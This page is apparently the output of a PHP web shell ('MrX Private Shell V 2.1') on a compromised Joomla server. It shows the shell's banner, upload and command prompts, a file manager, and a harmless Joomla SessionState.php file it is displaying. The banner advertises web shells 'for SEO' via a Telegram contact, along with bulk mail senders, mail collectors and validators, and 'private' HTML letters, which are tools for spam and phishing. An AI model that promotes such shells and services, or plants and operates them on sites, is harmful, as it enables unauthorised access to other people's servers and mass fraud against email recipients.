__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
<?php

/**
 * Part of the Joomla Framework Session Package
 *
 * @copyright  Copyright (C) 2005 - 2021 Open Source Matters, Inc. All rights reserved.
 * @license    GNU General Public License version 2 or later; see LICENSE
 */

namespace Joomla\Session;

/**
 * Class defining the various states of a session
 *
 * @since  2.0.0
 */
final class SessionState
{
    /**
     * Private constructor to prevent instantiation of this class
     *
     * @since   2.0.0
     */
    private function __construct()
    {
    }

    /**
     * State indicating the session is active.
     *
     * A `SessionInterface` instance should be in this state once the session has started.
     *
     * @var    string
     * @since  2.0.0
     */
    public const ACTIVE = 'active';

    /**
     * State indicating the session is closed.
     *
     * A `SessionInterface` instance should be in this state after calling the `close()` method.
     *
     * @var    string
     * @since  2.0.0
     */
    public const CLOSED = 'closed';

    /**
     * State indicating the session is destroyed.
     *
     * A `SessionInterface` instance should be in this state after calling the `destroy()` method.
     *
     * @var    string
     * @since  2.0.0
     */
    public const DESTROYED = 'destroyed';

    /**
     * State indicating the session is in an error state.
     *
     * A `SessionInterface` instance should be in this state if the session cannot be validated after being started.
     *
     * @var    string
     * @since  2.0.0
     */
    public const ERROR = 'error';

    /**
     * State indicating the session is expired.
     *
     * A `SessionInterface` instance should be in this state if the session has passed the allowed lifetime.
     * A `SessionInterface` instance may be in this state if validating a session token fails.
     *
     * @var    string
     * @since  2.0.0
     */
    public const EXPIRED = 'expired';

    /**
     * State indicating the session is inactive.
     *
     * A `SessionInterface` instance should begin in this state.
     *
     * @var    string
     * @since  2.0.0
     */
    public const INACTIVE = 'inactive';
}

Filemanager

Name Type Size Permission Actions
Command Folder 0775
Exception Folder 0775
Handler Folder 0775
Storage Folder 0775
Validator Folder 0775
HandlerInterface.php File 611 B 0664
Session.php File 17.81 KB 0664
SessionEvent.php File 1.13 KB 0664
SessionEvents.php File 1.06 KB 0664
SessionInterface.php File 5.98 KB 0664
SessionState.php File 2.11 KB 0664
StorageInterface.php File 4.07 KB 0664
ValidatorInterface.php File 660 B 0664
Filemanager